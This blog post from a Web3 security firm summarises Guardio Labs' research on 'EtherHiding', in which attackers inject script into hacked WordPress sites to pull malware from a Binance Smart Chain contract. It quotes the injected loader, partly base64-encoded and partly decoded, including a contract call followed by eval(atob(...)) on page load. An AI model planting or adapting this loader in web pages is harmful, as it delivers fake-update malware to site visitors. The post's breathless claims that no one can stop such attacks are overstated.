Etherhiding, or How to Host Malicious Code Forever After
““EtherHiding” presents a novel twist on serving malicious code by utilizing Binance’s Smart Chain contracts to host parts of a malicious code chain in what is the next level of Bullet-Proof Hosting.” reported Nati Tal, Head of Guardio Labs & Oleg Zaytsev, Security Researcher at Guardio.
In their latest cybersecurity report, they unveiled an extremely worrying new trend adopted by some phishing scammers that could make them stronger, mightier and downright virtually unstoppable.
A true cybersecurity horror story.
In Web3, “Code is Law.”
And scammers are using the Blockchain immutable quality to become impervious to any attempt at taking down malicious code they are using during their criminal process.
Guardio Labs has dubbed this technique Etherhiding, and summarized it in one horror-inducing sentence: “Hiding Web2 Malicious Code in Web3 Smart Contracts.”
Here’s a comprehensive breakdown of a development that promises to bring pandomonium to the lives of both web2 and web3 users.
This story begins in a very classical scamming fashion. Scammers are hijacking legit websites to post, as soon as you click on it, a front page that will tell their victims that they need to update their browser to have access to it.
The victims will end up downloading a malware like spywares that will collect user activity data without their knowledge.
Guardio underlines that this “fake-update” malware propagation campaign has been months long and part of a widespread campaign, named “ClearFake”, originally identified by security researcher Randy McEoin.
Wordpress, The Unwilling Trojan Horse
One of the main protagonist behind this whole affair is WordPress.
WordPress is a popular content management system (CMS) used by millions of websites around the world. While it is not inherently more vulnerable than other CMS platforms, there are several reasons why WordPress sites can be susceptible to hacking:
- outdated software (many WordPress sites run outdated versions of the CMS, themes, and plugins)
- poorly secured plugins and themes developed by third parties
- weak passwords making them susceptible to brute force attack
- poorly configured permissions
- SQL Injection and Cross-Site Scripting (XSS) which are common web application vulnerabilities that can affect WordPress sites
- lack of security measures by some users who do not implement them properly by using firewalls, security plugins, or SSL certificates, leaving their sites more vulnerable to attacks
Profitting off this slew of vulnerabilities, the fraudsters attacked en masse compromised WordPress sites.
They inserted the following code into the primary template of a WordPress site.
SOURCE - Guardio Labs: https://labs.guard.io/etherhiding-hiding-web2-malicious-code-in-web3-smart-contracts-65ea78efad16
<script src="https://cdn.ethers.io/lib/ethers-5.2.umd.min.js" type="application/javascript"></script>
<script src="data:text/javascript;base64,YXN5bmMgZnVuY3Rpb24gbG9hZCgpe2xldCBwcm92aWRlcj1uZXcgZXRoZXJz
LnByb3ZpZGVycy5Kc29uUnBjUHJvdmlkZXIoImh0dHBzOi8vYnNjLWRhdGFzZWVkMS5iaW5hbmNlLm9yZy8iKSxzaWduZXI9cHJvd
[......]b2FkOw=="></script>This is the first step in the ‘ClearFake’ two-step hacking protocol.
‘This initial “bridgehead” code is injected into article pages and retrieves a second-stage payload from a server controlled by the attackers, which then carries out the rest of the site defacement,’ explains Guardio Labs.
This is when the second protagonist of the story enters the scene.
Cloudfare, the Unwilling Trigger
As breakdown by Guardio, the second step involves the initial code “retrieving a second-stage playload from a server.”
A (very!) simplified schematic representation of this sentence would be: Code #1 on Wordpress communicates with Code #2 on a server.
Code #2, or second-stage code, allows the attackers, without even having to re-access the hacked WordPress sites, to “remotely and instantly modify the infection process and display any message they want. […] change tactics, update blocked domains, and switch out detected payloads […].”, per Guardio.
The server on which Code #2 was hosted was Cloudflare Workers.
Probably after receiving many abuse reports, Cloudfare decided to block the accounts hosting the malicious code, tolling the bells for many a nefarious actors behind the ‘ClearFake’ campaign.
The story could have stopped here.
But it was fated not to be so.
If there is one thing one should never underestimate, it is the astuteness of scammers.
The scamming shows must go on, so a way to do so was found.
And so the story go on.
BNB Chain, the Unwilling Complice
Since hosting code on abused Cloudflare Worker hosts wouldn’t do, they set their sights on a new possibility: the Blockchain.
The Blockchain allows both the hosting of the malicious code in an anonymous way, and, on paper, the inability for anyone to ever take it down.
This novel method of hosting malicious code is pure evil genius.
Once, threat actors’ activities could be curtailed; now, no one can stop them.
The detailled dissection of Etherhiding by Guardio displays how — using the exact same code from when Code #2 was hosted on Cloudfare — the first-stage code on WordPress queries the Binance Blockchain:
SOURCE - Guardio Labs: https://labs.guard.io/etherhiding-hiding-web2-malicious-code-in-web3-smart-contracts-65ea78efad16
// include <https://cdn.ethers.io/lib/ethers-5.2.umd.min.js>
async function load() {
let provider = new ethers.providers.JsonRpcProvider("https://bsc-dataseed1.binance.org/"),
signer = provider.getSigner(),
address = "0x7f36D9292e7c70A204faCC2d255475A861487c60",
ABI = [
{ inputs: [{ internalType: "string", .......},
{ inputs: [], name: "get", ......},
{ inputs: [], name: "link", ....... },
],
contract = new ethers.Contract(address, ABI, provider),
link = await contract.get();
eval(atob(link));
}
window.onload = load;Guardio reveals:
“Once the first stage code on the compromised WordPress site loads, it calls the Binance’s SDK
eth_callmethod on the BlockChain and fetches the malicious JavaScript code above.
eth_callis a read-only and cost-free operation, originally designed to simulate contract execution for reading data or testing without any real-world impact.As such, it is not even recorded on the blockchain.
So you get a free, untracked, and robust way to get your data (the malicious payload) without leaving traces.”
More, it was found out that the “second stage domain is being changed on an almost daily basis.”
Proving that Blockchain hosting is perfect for blurring criminal activities by making the update of an entire attack chain possible with a single blockchain transaction.
On-chain hosting of malicious code by being cost-efficient, anonymous, arduously tracable and almost impossible to take down, promises to bring forth a new era.
One where the phishing and malware industry will be able to prosper as never before.
In face of such a threat, Guardio is asking Binance to step in by disabling:
1- any query to already tagged as “Malicious” addresses
2 -eth_call debug method for unvalidated contracts
Will Binance do so? Will it even be enough?
The coming months and years will let us know soon enough, if it was all a blip or one of the biggest challenge posed to the cybersecurity industry.
About us
Nefture is a Web3 real-time security and risk prevention platform that detects on-chain vulnerabilities and protects digital assets, protocols and asset managers from significant losses or threats.
Nefture core services includes Real-Time Transaction Security and a Threat Monitoring Platform that provides accurate exploits detections and fully customized alerts covering hundreds of risk types with a clear expertise in DeFi.
Today, Nefture proudly collaborates with leading projects and asset managers, providing them with unparalleled security solutions.
